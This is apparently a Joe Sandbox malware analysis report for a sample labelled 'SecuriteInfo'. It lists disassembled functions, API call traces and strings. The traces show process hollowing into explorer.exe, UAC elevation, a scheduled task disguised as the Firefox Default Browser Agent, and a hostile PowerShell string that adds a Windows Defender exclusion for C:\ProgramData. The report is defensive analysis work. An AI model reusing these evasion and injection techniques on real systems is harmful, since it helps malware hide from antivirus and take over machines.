Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings$Userlstrlenwnsprintf$AttributesBufferDirectoryErrorFileFreeInfoInitializeLastNameObjectSystemUninitializeWow64lstrcpywsprintf
String ID: "%s"$$$%%ProgramData%%\r%Sr.js$%ComSpec%$%ProgramFiles%$%ProgramW6432%$/c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"$Elevation:Administrator!new:%s${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
API String ID: 3941589607-3081872691
Opcode ID: 6724e0b31b8f6d61e6e42771fc87c6c06ab73a68e16e86e0615cd6320e661db1
Instruction ID: 74f867b2db748e75f443496cadd2c7930908fc8c0ae7ae9f5119a493ea89c961
Opcode Fuzzy Hash: 6724e0b31b8f6d61e6e42771fc87c6c06ab73a68e16e86e0615cd6320e661db1
Instruction Fuzzy Hash: A0512CB2941218ABDB20DB94DC59FDEF7BCEB44715F010496E609E7250FBB49A84CFA0

Function 00BD5C70 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 277
injectionthreadprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(ntdll,NtUnmapViewOfSection), ref: 00BD5C93
GetProcAddress.KERNEL32(00000000), ref: 00BD5C9A
CreateProcessW.KERNEL32(C:\Windows\system32\explorer.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000000), ref: 00BD5D5D
NtQueryInformationProcess.NTDLL ref: 00BD5D7A
ReadProcessMemory.KERNEL32(00000000,?,?,00000480,00000000), ref: 00BD5D94
GetThreadContext.KERNEL32(?,00010007), ref: 00BD5DA4
VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040), ref: 00BD5DD8
WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 00BD5E02
WriteProcessMemory.KERNEL32(00000000,?,?,?,00000000,?,?,00000000), ref: 00BD5E3B
ReadProcessMemory.KERNEL32(00000000,?,00000000,00000004,00000000,?,?,00000000), ref: 00BD5F1B
WriteProcessMemory.KERNEL32(00000000,?,00000000,00000004,00000000,?,?,00000000), ref: 00BD5F33
WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,00000000), ref: 00BD5F7B
SetThreadContext.KERNEL32(?,00010007,?,?,00000000), ref: 00BD5F96
ResumeThread.KERNEL32(?,?,?,00000000), ref: 00BD5F9F
CloseHandle.KERNEL32(?), ref: 00BD5FAE
CloseHandle.KERNEL32(00000000), ref: 00BD5FB3

Strings

C:\Windows\system32\certutil.exe, xrefs: 00BD5CD0
NtUnmapViewOfSection, xrefs: 00BD5C89
C:\Windows\system32\explorer.exe, xrefs: 00BD5CE0, 00BD5D5C
.reloc, xrefs: 00BD5E91
ntdll, xrefs: 00BD5C8E

Memory Dump Source

Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Process$Memory$Write$HandleThread$CloseContextRead$AddressAllocCreateInformationModuleProcQueryResumeVirtual
String ID: .reloc$C:\Windows\system32\certutil.exe$C:\Windows\system32\explorer.exe$NtUnmapViewOfSection$ntdll
API String ID: 918112823-4001407722
Opcode ID: 83519d47db83f6c5bf0d760d757945b3a19bbd6a68c25501490df7259e0dd4b8
Instruction ID: b5fecf24fd49fa9409fa449e1459b7d681c4199d0e9af7e31a5697498f2a1dee
Opcode Fuzzy Hash: 83519d47db83f6c5bf0d760d757945b3a19bbd6a68c25501490df7259e0dd4b8
Instruction Fuzzy Hash: 32B13D71A01219EFDF24CF98DC84BADFBF5FB48304F1440AAE909AB291E73599458B54

Function 00BD86E6 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 175
sleepencryptionfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000), ref: 00BD81A6
Sleep.KERNEL32(00000000), ref: 00BD86D6
InitializeCriticalSection.KERNEL32(00BDA090), ref: 00BD8732

Part of subcall function 00BD71A0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00000001,80000002), ref: 00BD71CA
Part of subcall function 00BD71A0: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,?,00000000,?), ref: 00BD71E6
Part of subcall function 00BD71A0: GetProcessHeap.KERNEL32(00000008,?), ref: 00BD71F9
Part of subcall function 00BD71A0: HeapAlloc.KERNEL32(00000000), ref: 00BD7200
Part of subcall function 00BD71A0: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,00000000,00000000,?), ref: 00BD721D
Part of subcall function 00BD71A0: RegCloseKey.ADVAPI32(80000002), ref: 00BD7229

GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00BD875F
StringFromGUID2.OLE32(?,?,00000080), ref: 00BD87B8
wsprintfA.USER32 ref: 00BD87CF
CreateMutexW.KERNEL32(00000000,00000001,?), ref: 00BD87E3
GetLastError.KERNEL32 ref: 00BD87EE
ExitProcess.KERNEL32 ref: 00BD88F3

Part of subcall function 00BD26B0: GetTickCount.KERNEL32 ref: 00BD26B2

WSAStartup.WS2_32(00000202,?), ref: 00BD882C
CryptAcquireContextA.ADVAPI32(00BDA4FC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 00BD8845
CryptAcquireContextA.ADVAPI32(00BDA4FC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000008), ref: 00BD8861
CoInitializeEx.OLE32(00000000,00000000), ref: 00BD88AC
ExpandEnvironmentStringsW.KERNEL32(%temp%\%paths%,?,00000104), ref: 00BD88C3
CreateFileW.KERNEL32(?,10000000,00000000,00000000,00000002,04000080,00000000), ref: 00BD88E2

Strings

%temp%\%paths%, xrefs: 00BD88BE
C:\, xrefs: 00BD875A
Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 00BD8839, 00BD8856

Memory Dump Source

Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: AcquireContextCreateCryptHeapInitializeProcessQuerySleepValue$AllocCloseCountCriticalEnvironmentErrorExitExpandFileFromInformationLastMutexOpenSectionStartupStringStringsTickVolumewsprintf
String ID: %temp%\%paths%$C:\$Microsoft Enhanced RSA and AES Cryptographic Provider
API String ID: 2776981366-2941900213
Opcode ID: 2e9ba3753abc1f0d331828f60eaf7813803318aa1c728f03cde48cb3674e1808
Instruction ID: d25f2be12285ac4a870932c913024ffd8693eeec291e8785f23c4e12288ad211
Opcode Fuzzy Hash: 2e9ba3753abc1f0d331828f60eaf7813803318aa1c728f03cde48cb3674e1808
Instruction Fuzzy Hash: C061C271A41348EBDB10DBA4DC55FADFBB8AF04701F1040ABE505E7291FFB09A448B55

Function 00BD7C30 Relevance: 28.4, APIs: 12, Strings: 4, Instructions: 432memorystringCOMMON

Download Yara Rule

APIs

StrCmpNIA.SHLWAPI(?,?,00000000), ref: 00BD7C7A
wnsprintfA.SHLWAPI ref: 00BD7D12
wsprintfA.USER32 ref: 00BD7D39
lstrcmpA.KERNEL32(?,Start), ref: 00BD7FBB
EnterCriticalSection.KERNEL32(00BDA090), ref: 00BD8011
GetProcessHeap.KERNEL32(00000008,?), ref: 00BD8078
HeapAlloc.KERNEL32(00000000), ref: 00BD807F
GetProcessHeap.KERNEL32(00000008,?,?), ref: 00BD808A
HeapReAlloc.KERNEL32(00000000), ref: 00BD8091
LeaveCriticalSection.KERNEL32(00BDA090), ref: 00BD80E8

Part of subcall function 00BD5FD0: GetModuleHandleW.KERNEL32(ntdll), ref: 00BD5FED
Part of subcall function 00BD5FD0: GetProcAddress.KERNEL32(00000000,NtCreateSection), ref: 00BD6001
Part of subcall function 00BD5FD0: GetProcAddress.KERNEL32(00000000,NtCreateProcessEx), ref: 00BD600C
Part of subcall function 00BD5FD0: GetProcAddress.KERNEL32(00000000,RtlCreateProcessParametersEx), ref: 00BD6017
Part of subcall function 00BD5FD0: GetProcAddress.KERNEL32(00000000,RtlDestroyProcessParameters), ref: 00BD6022
Part of subcall function 00BD5FD0: GetProcAddress.KERNEL32(00000000,NtCreateThreadEx), ref: 00BD602D
Part of subcall function 00BD5FD0: GetTempPathW.KERNEL32(000000F6,?), ref: 00BD6046
Part of subcall function 00BD5FD0: wnsprintfW.SHLWAPI ref: 00BD6081
Part of subcall function 00BD5FD0: PathCombineW.SHLWAPI(?,?,?), ref: 00BD609B
Part of subcall function 00BD5FD0: CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000002,00000080,00000000), ref: 00BD60C2
Part of subcall function 00BD5FD0: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00BD60E6
Part of subcall function 00BD5FD0: SetEndOfFile.KERNEL32(00000000), ref: 00BD60E9
Part of subcall function 00BD5FD0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BD60F6
Part of subcall function 00BD5FD0: wnsprintfW.SHLWAPI ref: 00BD6114

GetProcessHeap.KERNEL32(00000000,?), ref: 00BD8107
HeapFree.KERNEL32(00000000), ref: 00BD810E

Strings

Start, xrefs: 00BD7FB5
%d|%s|%.16s|, xrefs: 00BD7D01
%s|%s, xrefs: 00BD7D33
0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 00BD7CB0

Memory Dump Source

Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Heap$AddressProc$File$Processwnsprintf$AllocCriticalPathSection$CombineCreateEnterFreeHandleLeaveModulePointerTempWritelstrcmpwsprintf
String ID: %d|%s|%.16s|$%s|%s$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ$Start
API String ID: 851647271-3778496198
Opcode ID: 9c761b5bfe46d0aaffd97ca6cd29d45ce79d35de1186d4c9e173fb0e045b85f5
Instruction ID: 393e35133cf271ecfa81f940305a3aa2e43df0d7f354eb6654472db10a7bc5a3
Opcode Fuzzy Hash: 9c761b5bfe46d0aaffd97ca6cd29d45ce79d35de1186d4c9e173fb0e045b85f5
Instruction Fuzzy Hash: 42E1F171A492569FDB298B288890BBAFBE6FF85301F1940EBD84697351FF308C46C750

Function 00BD8710 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 121encryptionfilesynchronizationCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00BDA090), ref: 00BD8732

Part of subcall function 00BD71A0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00000001,80000002), ref: 00BD71CA
Part of subcall function 00BD71A0: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,?,00000000,?), ref: 00BD71E6
Part of subcall function 00BD71A0: GetProcessHeap.KERNEL32(00000008,?), ref: 00BD71F9
Part of subcall function 00BD71A0: HeapAlloc.KERNEL32(00000000), ref: 00BD7200
Part of subcall function 00BD71A0: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,00000000,00000000,?), ref: 00BD721D
Part of subcall function 00BD71A0: RegCloseKey.ADVAPI32(80000002), ref: 00BD7229

GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00BD875F
StringFromGUID2.OLE32(?,?,00000080), ref: 00BD87B8
wsprintfA.USER32 ref: 00BD87CF
CreateMutexW.KERNEL32(00000000,00000001,?), ref: 00BD87E3
GetLastError.KERNEL32 ref: 00BD87EE
ExitProcess.KERNEL32 ref: 00BD88F3

Part of subcall function 00BD26B0: GetTickCount.KERNEL32 ref: 00BD26B2

WSAStartup.WS2_32(00000202,?), ref: 00BD882C
CryptAcquireContextA.ADVAPI32(00BDA4FC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 00BD8845
CryptAcquireContextA.ADVAPI32(00BDA4FC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000008), ref: 00BD8861
CoInitializeEx.OLE32(00000000,00000000), ref: 00BD88AC
ExpandEnvironmentStringsW.KERNEL32(%temp%\%paths%,?,00000104), ref: 00BD88C3
CreateFileW.KERNEL32(?,10000000,00000000,00000000,00000002,04000080,00000000), ref: 00BD88E2

Strings

%temp%\%paths%, xrefs: 00BD88BE
C:\, xrefs: 00BD875A
Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 00BD8839, 00BD8856

Memory Dump Source

Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: AcquireContextCreateCryptHeapInitializeProcessQueryValue$AllocCloseCountCriticalEnvironmentErrorExitExpandFileFromInformationLastMutexOpenSectionStartupStringStringsTickVolumewsprintf
String ID: %temp%\%paths%$C:\$Microsoft Enhanced RSA and AES Cryptographic Provider
API String ID: 267019445-2941900213
Opcode ID: 46cde534e7c9676be72e6822b46845f2cb169df6cb229f75f6e9d86dc39beee1
Instruction ID: ca0ccad8ddb050859f07c0b99f5968ca64b266975f613fbc8309ca83faaf1923
Opcode Fuzzy Hash: 46cde534e7c9676be72e6822b46845f2cb169df6cb229f75f6e9d86dc39beee1
Instruction Fuzzy Hash: C441A474A41308EAE710DBA4DD1AF99F7B8EB04705F1080A7F205EB2E1FFB096448B55

Function 00BD93A0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86memoryencryptionCOMMON

Download Yara Rule

APIs

CryptGenRandom.ADVAPI32(00000020,?), ref: 00BD93B8

Part of subcall function 00BD2850: GetProcessHeap.KERNEL32(00000008,AAAAAAAB,?,?,?,?,00BD9405,00000000), ref: 00BD2872
Part of subcall function 00BD2850: HeapAlloc.KERNEL32(00000000,?,?,?,?,00BD9405,00000000), ref: 00BD2879

GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BD9415
HeapFree.KERNEL32(00000000), ref: 00BD941C
wsprintfA.USER32 ref: 00BD944F
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BD9488
HeapFree.KERNEL32(00000000), ref: 00BD948B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BD9490
HeapFree.KERNEL32(00000000), ref: 00BD9493

Strings

%d|%s|%s|%s, xrefs: 00BD9449
45LkAGkF, xrefs: 00BD9437

Memory Dump Source

Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$AllocCryptRandomwsprintf
String ID: %d|%s|%s|%s$45LkAGkF
API String ID: 4113358155-2124572182
Opcode ID: f1c3a8e2b23f42337c2e79049f0c7383857b08207e3dde7db5f248427f72872c
Instruction ID: 2ab20eeeee7643013383cfb571322f4e235ace75d11e1ca738869d2c5b1882bb
Opcode Fuzzy Hash: f1c3a8e2b23f42337c2e79049f0c7383857b08207e3dde7db5f248427f72872c
Instruction Fuzzy Hash: FD2108719003486BEB10A7909C16FDFFBADDF44714F0401A2FA08A73D2FA619905C7A6

Function 00BD6C60 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 95memorycomCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00BD6C77
CoCreateInstance.OLE32(00BD1020,00000000,00000001,00BD1000,?), ref: 00BD6C94
SysAllocString.OLEAUT32(\Mozilla), ref: 00BD6CD4
SysFreeString.OLEAUT32(?), ref: 00BD6D0B
SysAllocString.OLEAUT32(Firefox Default Browser Agent 318146B0AF4A39CB), ref: 00BD6D18
SysFreeString.OLEAUT32(00000000), ref: 00BD6D2F

Strings

\Mozilla, xrefs: 00BD6CCF
Firefox Default Browser Agent 318146B0AF4A39CB, xrefs: 00BD6D13

Memory Dump Source

Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: String$AllocFree$CreateInitInstanceVariant
String ID: Firefox Default Browser Agent 318146B0AF4A39CB$\Mozilla
API String ID: 478541636-3211539605
Opcode ID: 65e05220bc180b4671c9d9a46469631164c1289e0fffdf3fae8b2d83d2a62b44
Instruction ID: b179097a8731376eed60aae9f4b0336e4988a899298a73a61d8e81439cecc05e
Opcode Fuzzy Hash: 65e05220bc180b4671c9d9a46469631164c1289e0fffdf3fae8b2d83d2a62b44
Instruction Fuzzy Hash: B5318534F01248AFD7009B68D899F9EBBB8EF45344F0581E9E945A7351EA309D85C7A0

Function 00BD6370 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 00BD637D
OpenProcessToken.ADVAPI32(00000000), ref: 00BD6384
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00BD6399
CloseHandle.KERNEL32(?), ref: 00BD63A6
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00BD63D0
CloseHandle.KERNEL32(?), ref: 00BD63DB

Strings

SeShutdownPrivilege, xrefs: 00BD6392

Memory Dump Source

Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 158869116-3733053543
Opcode ID: 3c9a6717a6f6617787783aa409cb08ed622c4d73946c6d29528f244bc6a7343d
Instruction ID: 55d015695722c40681b8d718133c6357d4453e92f1e69734f4449aca55369e23
Opcode Fuzzy Hash: 3c9a6717a6f6617787783aa409cb08ed622c4d73946c6d29528f244bc6a7343d
Instruction Fuzzy Hash: 51014F31A41218FBDB209BE4ED0EFAEBBBDEB04711F114096F914A7290FB714A1497A5

Function 00D14EEC Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00D14EF8
IsDebuggerPresent.KERNEL32 ref: 00D14FC4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D14FDD
UnhandledExceptionFilter.KERNEL32(?), ref: 00D14FE7

Memory Dump Source

Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 44a543181887f2b58dc04dfaff4944b82446d3cabeddf5e82e6f2237280832c7
Instruction ID: ca823bb2a28f8666d778fec11139f7c730c43227bc90420d43c47e9a32d74703
Opcode Fuzzy Hash: 44a543181887f2b58dc04dfaff4944b82446d3cabeddf5e82e6f2237280832c7
Instruction Fuzzy Hash: 2E31F975D05318EBDB21DFA4E9497CDBBB8AF08300F1041AAE40CAB250EB759B85CF65

Function 00D1788B Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00D17983
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00D1798D
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00D1799A

Memory Dump Source

Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 7ffc34e66c9d24a2f7e58834265f9f2de36cd1664b6945f4ad5e2db96c03a118
Instruction ID: 1eaf8ea2cbaf437cf1cfaafae62d5c04607a1b0c3a32f76f3280792da91b4fbd
Opcode Fuzzy Hash: 7ffc34e66c9d24a2f7e58834265f9f2de36cd1664b6945f4ad5e2db96c03a118
Instruction Fuzzy Hash: 96319574901218ABCB21DF64E989BDDB7B4BF58310F5041DAE41CA7250EB749BC58F64

Function 00D1FD81 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00D1FD7C,?,?,00000008,?,?,00D1F97F,00000000), ref: 00D1FFAE

Memory Dump Source

Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 6f2f39fc9350656791ae5724d14b1cd5c8eaf8a0a866cd8f9fa584a9fb890eaf
Instruction ID: f7640218b009415191c14cc88de251d2edbfd8de8bc59e87ae92c9934b15318d
Opcode Fuzzy Hash: 6f2f39fc9350656791ae5724d14b1cd5c8eaf8a0a866cd8f9fa584a9fb890eaf
Instruction Fuzzy Hash: 9DB15C312106089FD715CF28D586BA57FE0FF45364F298668E8DACF2A2C735E982CB50

Function 00D15185 Relevance: 1.7, APIs: 1, Instructions: 242COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00D1519B

Memory Dump Source

Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 7b5ddb0e7c1b1a6a1237a3bb72a3f52bf7c60916c39fea96688cbe0ad5e91b7b
Instruction ID: b813c7ae5632160368646468051a352a204524245c452d85198befd307906038
Opcode Fuzzy Hash: 7b5ddb0e7c1b1a6a1237a3bb72a3f52bf7c60916c39fea96688cbe0ad5e91b7b
Instruction Fuzzy Hash: 8EA18EB2910704DBDB29CF54E98179EBBB0FB95320F28812AD425E7754D7789981CF70

Function 00D19A4A Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78e528a6a09bc100e0fd72c8f7cf6fa7795f038fe6fc494cc1d8250406a58990
Instruction ID: da122428240b7ab3878f992b75058e52d955efb29a170bbef40c50b51dee35c8
Opcode Fuzzy Hash: 78e528a6a09bc100e0fd72c8f7cf6fa7795f038fe6fc494cc1d8250406a58990
Instruction Fuzzy Hash: 3C31D472900218BFCB20DEA8ECE5DEBB77DEF84310F184158F80597244EA30AE808B70

Function 00BD26B0 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00BD26B2

Memory Dump Source

Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: CountTick
String ID:
API String ID: 536389180-0
Opcode ID: c38598549e83ff64abf5b73316c237ec0e718ef0f1d3a2f818954b0fde65be40
Instruction ID: 802916534a5f05f138557cc36385cedb6817ea4bfef140e9dc96007d2927693a
Opcode Fuzzy Hash: c38598549e83ff64abf5b73316c237ec0e718ef0f1d3a2f818954b0fde65be40
Instruction Fuzzy Hash: 49318C363114008BC75CCF2CECA5A25F3E2A799314B19867BD91AD73E1FA35E802CB45

Function 00D15079 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00005085,00D1488D), ref: 00D1507E

Memory Dump Source

Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
